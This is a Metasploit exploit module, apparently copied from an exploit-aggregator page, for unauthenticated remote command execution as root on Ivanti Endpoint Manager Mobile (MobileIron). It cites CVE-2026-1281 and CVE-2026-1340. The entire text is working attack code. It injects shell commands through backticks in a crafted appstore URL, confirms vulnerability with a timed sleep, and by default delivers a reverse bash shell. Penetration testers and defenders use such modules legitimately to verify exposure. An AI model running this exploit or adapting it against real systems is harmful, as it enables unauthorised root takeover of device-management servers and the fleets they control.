Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-LINUX-HTTP-IVANTI_EPMM_RCE-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE',
        'Description' => %q{
          This module exploits a OS command injection issue in Ivanti Endpoint Manager Mobile (EPMM), formerly known
          as MobileIron. A remote attacker can achieve unauthenticated RCE with root privileges on an affected device.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'watchTowr', # Original analysis and PoC
          'sfewer-r7' # MSF module
        ],
        'References' => [
          ['CVE', '2026-1281'],
          ['CVE', '2026-1340'],
          # Vendor advisory
          ['URL', 'https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
          # Vendor guidance
          ['URL', 'https://forums.ivanti.com/s/article/Analysis-Guidance-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US'],
          # Technical analysis & PoC
          ['URL', 'https://labs.watchtowr.com/someone-knows-bash-far-too-well-and-we-love-it-ivanti-epmm-pre-auth-rces-cve-2026-1281-cve-2026-1340/']
        ],
        'DisclosureDate' => '2026-01-29',
        'Privileged' => true, # Executes as root.
        'Platform' => ['unix', 'linux'],
        'Arch' => ARCH_CMD,
        'Targets' => [
          [
            # Successfully tested with the following payloads against MobileIron 11.2:
            #   cmd/unix/reverse_bash
            #   cmd/unix/reverse_netcat
            # NOTE: The Linux fetch payloads did not work on MobileIron 11.2, YMMV on later product versions.
            'Default', {
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash',
                'FETCH_WRITABLE_DIR' => '/tmp'
              }
            }
          ],
        ],
        'Payload' => {
          'BadChars' => '`'
        },
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([OptString.new('TARGETURI', [true, 'Base path', '/'])])
  end

  def check
    res_ver = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mifs', 'user', 'login.jsp')
    )

    return CheckCode::Unknown('Connection to /mifs/user/login.jsp failed') unless res_ver

    return CheckCode::Unknown("Unexpected /mifs/user/login.jsp response code #{res_ver.code}") unless res_ver.code == 200

    ver_match = res_ver.body.match(/ui\.login\.css\?([\d.]+)"/)

    return CheckCode::Unknown('Failed to version match on ui.login.css') unless ver_match

    product_name = 'EPMM'

    # Ivanti acquired MobileIron and rebranded it to Endpoint Manager Mobile (EPMM) around version 11.4.
    if Rex::Version.new(ver_match[1]) < Rex::Version.new('11.4.0.0')
      product_name = 'MobileIron'
    end

    version_string = "Detected Ivanti #{product_name} version #{ver_match[1]}"

    sleep_time = rand(4..8)

    # We use proof-of-execution in the form of a delay to confirm if a target is vulnerable.
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_cmd("sleep #{sleep_time}")
    end

    return CheckCode::Unknown("#{version_string}. Connection failed") unless res

    if elapsed_time < sleep_time
      return CheckCode::Safe(version_string)
    end

    CheckCode::Vulnerable(version_string)
  end

  def exploit
    execute_cmd(payload.encoded)
  end

  def execute_cmd(cmd)
    elements = {
      'kid' => rand(32),
      'st' => 'theValue'.ljust(10), # A length check in EPMM requires this value to be 10 characters long.
      'et' => (Time.now + (60 * 60 * rand(24))).to_i,
      'h' => "gPath[`#{cmd}`]"
    }

    hash = 'sha256:'

    hash += elements.map { |k, v| "#{k}=#{Rex::Text.uri_encode(v.to_s, 'hex-noslashes')}" }.join(',')

    vprint_status("hash: #{hash}")

    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(
        target_uri.path,
        'mifs',
        'c',
        'appstore',
        'fob',
        '3',
        rand(1024).to_s,
        hash,
        "#{SecureRandom.uuid}.ipa"
      )
    )
  end
end